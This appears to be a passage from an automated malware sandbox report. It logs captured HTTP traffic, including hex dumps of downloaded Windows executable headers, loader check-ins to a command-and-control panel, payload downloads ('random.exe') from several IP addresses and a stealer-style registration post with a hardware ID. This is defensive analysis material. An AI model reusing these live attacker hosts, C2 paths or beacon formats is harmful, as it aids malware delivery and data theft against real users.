00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:26 GMTContent-Type: application/octet-streamContent-Length: 1840128Last-Modified: Sat, 30 Nov 2024 03:04:55 GMTConnection: keep-aliveETag: "674a80d7-1c1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce b4 e2 38 8a d5 8c 6b 8a d5 8c 6b 8a d5 8c 6b e5 a3 27 6b 92 d5 8c 6b e5 a3 12 6b 87 d5 8c 6b e5 a3 26 6b b0 d5 8c 6b 83 ad 0f 6b 89 d5 8c 6b 83 ad 1f 6b 88 d5 8c 6b 0a ac 8d 6a 89 d5 8c 6b 8a d5 8d 6b d6 d5 8c 6b e5 a3 23 6b 98 d5 8c 6b e5 a3 11 6b 8b d5 8c 6b 52 69 63 68 8a d5 8c 6b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e8 97 48 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 98 02 00 00 22 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 83 e5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 71 77 6e 6b 75 61 79 00 80 1a 00 00 10 50 00 00 74 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6c 72 73 63 6d 6b 70 00 10 00 00 00 90 6a 00 00 06 00 00 00 ec 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 f2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:34 GMTContent-Type: application/octet-streamContent-Length: 922112Last-Modified: Sat, 30 Nov 2024 03:03:02 GMTConnection: keep-aliveETag: "674a8066-e1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5e 80 4a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 62 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 75 5f 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 18 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 a6 00 00 00 40 0d 00 00 a8 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:42 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:28 GMTConnection: keep-aliveETag: "674a8080-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 2a 00 00 06 00 00 00 0c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 4467200Last-Modified: Sat, 30 Nov 2024 01:19:55 GMTConnection: keep-aliveETag: "674a683b-442a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 65 49 49 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 4f 00 00 d8 78 00 00 32 00 00 00 c0 ca 00 00 10 00 00 00 60 4f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 ca 00 00 04 00 00 0a 72 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 30 76 00 73 00 00 00 00 20 76 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 9d ca 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 9d ca 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 76 00 00 10 00 00 00 3c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 76 00 00 02 00 00 00 4c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 76 00 00 02 00 00 00 4e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 38 00 00 40 76 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 79 69 6a 74 61 62 62 00 c0 1b 00 00 f0 ae 00 00 b2 1b 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6b 62 76 70 6f 6f 7a 00 10 00 00 00 b0 ca 00 00 04 00 00 00 04 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 ca 00 00 22 00 00 00 08 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:52 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:30 GMTConnection: keep-aliveETag: "674a8082-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 2a 00 00 06 00 00 00 0c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:07:05 GMTContent-Type: application/octet-streamContent-Length: 2038784Last-Modified: Sat, 30 Nov 2024 01:37:00 GMTConnection: keep-aliveETag: "674a6c3c-1f1c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 d9 52 43 b2 b8 3c 10 b2 b8 3c 10 b2 b8 3c 10 ac ea b8 10 ac b8 3c 10 ac ea a9 10 ad b8 3c 10 ac ea bf 10 cd b8 3c 10 95 7e 47 10 b1 b8 3c 10 b2 b8 3d 10 33 b8 3c 10 ac ea b6 10 b3 b8 3c 10 ac ea a8 10 b3 b8 3c 10 ac ea ad 10 b3 b8 3c 10 52 69 63 68 b2 b8 3c 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 18 5b c6 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7c 05 00 00 ec 00 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 a1 26 1f 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 60 06 00 34 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c ff 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 ae 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 34 82 00 00 00 60 06 00 00 3c 00 00 00 be 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 00 07 00 00 02 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6c 67 66 72 74 61 73 00 00 1b 00 00 40 31 00 00 f6 1a 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 70 71 64 69 7a 68 00 10 00 00 00 40 4c 00 00 06 00 00 00 f4 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 fa 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010480001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010481001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010482001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 31 37 35 42 36 37 42 38 31 31 30 37 33 34 30 34 30 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="hwid"C47175B67B81107340409------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="build"drum------DGCGDBGCAAEBFIECGHDG--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010483001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
